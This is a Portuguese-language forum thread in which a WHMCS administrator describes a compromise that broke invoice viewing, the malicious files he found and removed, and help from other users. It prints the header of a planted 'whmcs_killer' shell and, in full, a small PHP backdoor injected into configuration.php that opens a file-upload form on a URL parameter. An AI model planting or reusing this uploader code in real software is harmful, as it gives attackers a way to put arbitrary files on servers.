Wilson

Editado> Olha ai a palhaçada rolando no youtube, o cara ta "ensinando" como fazer o esquema: com o WHMCS Pentester: http://www.youtube.com/watch?v=NZ0kncM5b34 Será que ninguem da WHMCS viu isso ainda? Vamos ficar olhando os caras invadirem o nosso sistema? Galera, Fui invadido tambem, Dentro do diretório do meu WHMCS, encontrei varios arquivos suspeitos, e com a data de modificação justamente do dia em que não consegui mais entrar em meu admin. Dentro da pasta Admin: Arquivo whmcs_killer com o seguinte código: <? /* __ ___ _ __ __ _____ _____ _ ___ _ _ \ \ / / | | | \/ |/ ____|/ ____| | |/ (_) | | \ \ /\ / /| |__| | \ / | | | (___ | ' / _| | | ___ _ __ \ \/ \/ / | __ | |\/| | | \___ \ | < | | | |/ _ \ '__| \ /\ / | | | | | | | |____ ____) | | . \| | | | __/ | \/ \/ |_| |_|_| |_|\_____|_____/ |_|\_\_|_|_|\___|_| 888 888 888 888 888 888 888 888 888 .d8888b .d88b. .d88888 .d88b. .d88888 88888b. 888 888 d88P" d88""88b d88" 888 d8P Y8b d88" 888 888 "88b 888 888 888 888 888 888 888 88888888 888 888 888 888 888 888 Y88b. Y88..88P Y88b 888 Y8b. Y88b 888 888 d88P Y88b 888 "Y8888P "Y88P" "Y88888 "Y8888 "Y88888 88888P" "Y88888 888 Y8b d88P "Y88P" .______ ___ .______ ____ ______ __ __ .__ __. | _ \ / \ | _ \ |___ \ / __ \ | | | | | \ | | | |_) | / ^ \ | |_) | __) | | | | | | | | | | \| | | / / /_\ \ | _ < |__ < | | | | | | | | | . ` | | |\ \----./ _____ \ | |_) | ___) | | `--' | | `--' | | |\ | | _| `._____/__/ \__\ |______/ |____/ \______/ \______/ |__| \__| mail : v.b-4@hotmail.com Greets: RENO ; az7rb ; ENG SILENT NIGHT And All P0c TEAM The Injector ; Sec4ever ; Lagripe-Dz ; ApOcalYpse ; RaYm0n ; And All Sec4ever TEAM */ ob_start(); $auth =1; + um monte de código criptografado. Deleitei todos os arquivos suspeitos, mudei senhas etc... Por mais que conseguiram fazer o upload destes arquivos, aparentemente eu não tive nenhum problema. Mesmo com o WHMCS atualizado com a ultima versão de segurança, o que pode ser? PQ sera que estão fazendo isso? O que o cara ganha?! E agora galera?

Me diz uma coisa caro, Eu posso deletar a pasta inteira que se encontra o whmcs, e depois subir para o ftp uma nova pasta do whmcs da mesma versão anterior, deletando a pasta instal, que não terei problemas?

Bom eu analisei por cima todas as pastas do whmcs não encontrei nada de suspeito, é inviável verificar arquivo por arquivo, será que eu estou protegido agora? Tem mais algo que eu possa fazer, ou arquivos especificos que seja melhor verificar? Mais uma vez, obrigado.

Caramba Pessoal! RESOLVI após a dica do Edvan. Cara muito obrigado! Tambem gostaria de agradecer a todos que responderam o topico tentando me ajudar. OBS: No arquivo configuration.php logo abaixo depois das informações de banco de dados etc, continha o seguinte código: <?php $id = $_GET['cmd']; if ($id ==up') { echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">'; echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>'; if( $_POST['_upl] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; } else { echo '<b>Upload GAGAL !!!</b><br><br>'; } } } ?> Apaguei tudo isso ai e subi novamente para o diretório e funcionou. OBS, eu fiz a atualização de segurança, mais acho que este código foi parar lá antes desta atualização, e eu só fui perceber por causa da fatura de clientes que vence perto do dia 20. Fica uma pergunta, o que este código pode causar de dano ao sistema, tirando esta falha das faturas, corro algum risco de segurança? Mais uma vez, obrigado pessoal.

Sim ja fiz isso, sem sucesso. Sei lá pessoal, o pior é parar do nada, sem eu ter feito nenhuma ação para tal.

Então, Eu ja desativei todas as formas de pagamento, atualizei o whmcs para a versão atual e mesmo assim o erro persiste... Não sei mais o que fazer, resumidamente o erro é este, ao criar faturas/visulizar/editar ele retorna o erro Invoice ID Not Found, mesmo no caso de alteração, na onde tenho certeza de que a fatura esta lá criada, e com o ID correto, se clicar para alterar a mesma da este erro...

Olá caros tudo bom? Estou com o seguinte erro ao visualizar/criar faturas pelo admin: Invoice # Invoice ID Not Found Acontece que qualquer cliente que acesse a sua conta, e clique em ver fatura, o sistema retorna a mensagem: Ocorreu um erro. Por favor, tente novamente. Se alguem poder me ajudar, agradeço! OBS: Vale ressaltar que eu não fiz nenhuma modificação no whmcs, não instalei nada no mesmo. Simplesmente do dia pra noite um cliente informou que não estava conseguindo pagar devido a um erro, fui verificar e identifiquei esta falha. Utilizo o whmcs a mais de 1 ano e nunca tive esse tipo de problema.